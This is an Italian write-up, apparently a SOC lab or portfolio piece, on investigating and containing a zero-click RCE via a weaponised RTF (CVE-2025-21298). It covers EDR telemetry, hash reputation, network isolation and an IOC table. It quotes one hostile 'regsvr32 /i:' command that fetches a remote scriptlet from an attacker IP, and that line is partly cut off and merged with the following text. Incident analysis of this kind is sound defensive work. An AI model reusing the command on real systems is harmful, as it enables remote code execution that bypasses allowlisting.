
Indagine tecnica e contenimento dell'host di un exploit RCE zero-click di gravità critica (CVE-2025-21298) utilizzando telemetria EDR e analisi statica del malware.
Questo progetto documenta l'indagine e il contenimento end-to-end di un tentativo di Esecuzione Remota di Codice (RCE) Zero-Click di gravità critica. Utilizzando la telemetria EDR e la threat intelligence, ho identificato un attacco "Living off the Land" (LotL) che ha bypassato le difese automatizzate e ha stabilito una comunicazione command-and-control (C2).
Ho identificato l'Event ID 314: Rilevamento RCE Zero-Click OLE di Windows. La telemetria iniziale ha rivelato che il file dannoso mail.rtf è stato Consentito dalle difese perimetrali, indicando una compromissione attiva sulla workstation 'Austin'.

Ho effettuato un controllo della reputazione dell'hash del file su VirusTotal. I risultati hanno confermato un tasso di rilevamento di 25/55, identificando specificamente il file come un RTF armamentizzato che utilizza CVE-2025-21298. Questa vulnerabilità consente l'esecuzione remota di codice tramite il riquadro di anteprima di Windows senza interazione da parte dell'utente.

Mi sono spostato sulla cronologia del terminale EDR per l'host 'Austin' per identificare il comportamento post-exploitation. Ho scoperto un'esecuzione dannosa "Living off the Land" (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe) per recuperare uno script-let dannoso da un server remoto, bypassando le liste di applicazioni consentite standard e le firme AV tradizionali.

Seguendo il NIST Incident Response Framework, è stata data priorità al contenimento immediato. Ho eseguito un Isolamento di Rete sull'host interessato per terminare la comunicazione C2 e prevenire il movimento laterale all'interno della rete aziendale.

L'incidente è stato chiuso come vero positivo. Ho documentato l'IP dell'attaccante (84.38.130.118) e le prove forensi per i team Threat Intelligence e Firewall per prevenire occorrenze future.

| Tipo | Valore |
|---|
| Indirizzo IP C2 | 84.38.130.118 |
| Hash del File (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Vulnerabilità | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |